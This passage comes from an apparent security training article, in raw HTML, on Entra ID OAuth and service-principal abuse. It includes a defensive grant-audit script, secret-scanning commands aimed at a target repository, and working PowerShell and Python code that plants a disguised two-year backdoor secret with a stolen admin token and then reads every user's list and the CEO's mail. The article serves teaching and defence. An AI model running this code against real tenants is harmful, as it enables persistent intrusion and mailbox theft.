class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># PowerShell: Enumerate all OAuth grants in tenant (run as Global Admin)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Directory.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Get all service principals with delegated permission grants</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$grants = 
Get-MgOauth2PermissionGrant -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># A foreach statement cannot be piped directly; wrap it in $( ) so its output flows into the pipeline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$(foreach ($grant in $grants) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $sp = Get-MgServicePrincipal -ServicePrincipalId $grant.ClientId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        AppName     = $sp.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        AppId       = $sp.AppId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Publisher   = $sp.PublisherName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Permissions = $grant.Scope</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        ConsentType = $grant.ConsentType  # AllPrincipals = admin consent, Principal = user</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        UserId      = $grant.PrincipalId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}) | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    
$_.Permissions -match \"Mail|Files|offline_access|MailboxSettings\" </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Export-Csv \"oauth_grants_audit.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-4-service-principal-and-application-credential-abuse--the-admins-blind-spot\">Section 4: Service Principal and Application Credential Abuse - The Admin's Blind Spot<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-4-service-principal-and-application-credential-abuse--the-admins-blind-spot\" class=\"hash-link\" aria-label=\"Direct link to Section 4: Service Principal and Application Credential Abuse - The Admin's Blind Spot\" title=\"Direct link to Section 4: Service Principal and Application Credential Abuse - The Admin's Blind Spot\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-service-principals-are-more-dangerous-than-user-accounts\">Why Service Principals Are More Dangerous Than User Accounts<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#why-service-principals-are-more-dangerous-than-user-accounts\" class=\"hash-link\" aria-label=\"Direct link to Why Service Principals Are More Dangerous Than User Accounts\" title=\"Direct link to Why Service Principals Are More Dangerous Than User Accounts\" translate=\"no\">​</a></h3>\n<p>A compromised user account is bad. A compromised service principal with application permissions is a catastrophe.</p>\n<p>Service principals represent applications in Entra ID. When an application has application permissions (as opposed to delegated permissions), it acts as itself, not on behalf of a user. This means:</p>\n<ul>\n<li class=\"\">No MFA.
Ever.</li>\n<li class=\"\">No Conditional Access policies (most are scoped to users)</li>\n<li class=\"\">Access tokens valid for 24 hours by default</li>\n<li class=\"\">Actions may not appear in user-facing audit logs</li>\n<li class=\"\">Often assigned privileged roles by developers who \"just needed it to work\"</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-attackers-obtain-service-principal-credentials\">How Attackers Obtain Service Principal Credentials<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-attackers-obtain-service-principal-credentials\" class=\"hash-link\" aria-label=\"Direct link to How Attackers Obtain Service Principal Credentials\" title=\"Direct link to How Attackers Obtain Service Principal Credentials\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-1-credential-leakage-in-code-repositories\">Path 1: Credential Leakage in Code Repositories<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-1-credential-leakage-in-code-repositories\" class=\"hash-link\" aria-label=\"Direct link to Path 1: Credential Leakage in Code Repositories\" title=\"Direct link to Path 1: Credential Leakage in Code Repositories\" translate=\"no\">​</a></h4>\n<p>The most common initial access vector for this attack type. 
Developers commit application secrets, certificate thumbprints, or client credentials to GitHub, GitLab, or Azure DevOps repositories, either accidentally or as hardcoded config.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Tools attackers use to hunt for leaked credentials</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># truffleHog: searches git history for high-entropy strings and known patterns</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">trufflehog </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">git</span><span class=\"token plain\"> https://github.com/target-company/repo --only-verified</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># gitleaks: fast scanner for secrets in git repos</span><span class=\"token plain\"></span><br></span><span class=\"token-line\"
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">gitleaks detect </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">--source</span><span class=\"token plain\"> /path/to/cloned/repo --report-format json</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># What attackers look for in leaked config files:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_CLIENT_ID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_CLIENT_SECRET=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># AZURE_TENANT_ID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-2-adding-credentials-to-an-existing-service-principal\">Path 2: Adding Credentials to an Existing Service Principal<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-2-adding-credentials-to-an-existing-service-principal\" class=\"hash-link\" aria-label=\"Direct link to Path 2: Adding Credentials to an Existing Service 
Principal\" title=\"Direct link to Path 2: Adding Credentials to an Existing Service Principal\" translate=\"no\">​</a></h4>\n<p>If an attacker compromises a Global Admin account (via any of the methods above), they can add new credentials to existing high-privileged service principals  creating a persistent backdoor that survives the original compromised account being remediated.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker adds a new secret to an existing privileged service principal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Requires Application.ReadWrite.All or privileged admin role</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -AccessToken $stolen_admin_token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find high-value service principals (ones with Directory or Exchange permissions)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targets = Get-MgServicePrincipal -All | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">    $_.AppRoles.Value -match \"Directory|Exchange|Mail|Sites\" -or</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    (Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $_.Id).ResourceDisplayName -eq \"Microsoft Graph\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Add backdoor credential to target service principal</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetSP = $targets[0]</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$credential = Add-MgServicePrincipalPassword -ServicePrincipalId $targetSP.Id -PasswordCredential @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"sync-service-key\"  # innocuous name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EndDateTime = (Get-Date).AddYears(2)  # 2-year validity</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Output \"New secret: $($credential.SecretText)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker now has 2-year access even after incident 
remediation</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Using the backdoored credential to authenticate and access data</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"target-tenant-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"service-principal-client-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_secret </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span 
class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"backdoor-secret-obtained-above\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Get access token  NO MFA, NO user interaction, NO Conditional Access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">token_response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    data</span><span class=\"token operator\" 
style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_secret\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> client_secret</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_credentials\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"scope\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/.default\"</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> token_response</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># With application permissions, access ALL users' mail (not just one account)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" 
style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all users in the tenant</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">all_users </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">\"https://graph.microsoft.com/v1.0/users?$select=id,mail,displayName,jobTitle\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Read mail for any specific executive</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ceo_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ceo-user-object-id\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ceo_mail </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://graph.microsoft.com/v1.0/users/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">ceo_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/messages?$top=50\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-3-workload-identity-federation-abuse\">Path 3: Workload Identity Federation Abuse<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-3-workload-identity-federation-abuse\" class=\"hash-link\" aria-label=\"Direct link 
to Path 3: Workload Identity Federation Abuse\" title=\"Direct link to Path 3: Workload Identity Federation Abuse\" translate=\"no\">​</a></h4>\n<p>Newer environments use Workload Identity Federation to allow applications in external systems (GitHub Actions, AWS, GCP) to authenticate to Entra ID without secrets. If an attacker compromises the external system (e.g., a GitHub repository), they inherit the Entra ID permissions.</p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># GitHub Actions workflow  legitimate use case</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># If the repository is compromised, attacker gets Entra ID access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">name</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Login to Azure</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">uses</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> azure/login@v1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">client-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_CLIENT_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tenant-id</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> $</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> secrets.AZURE_TENANT_ID </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span 
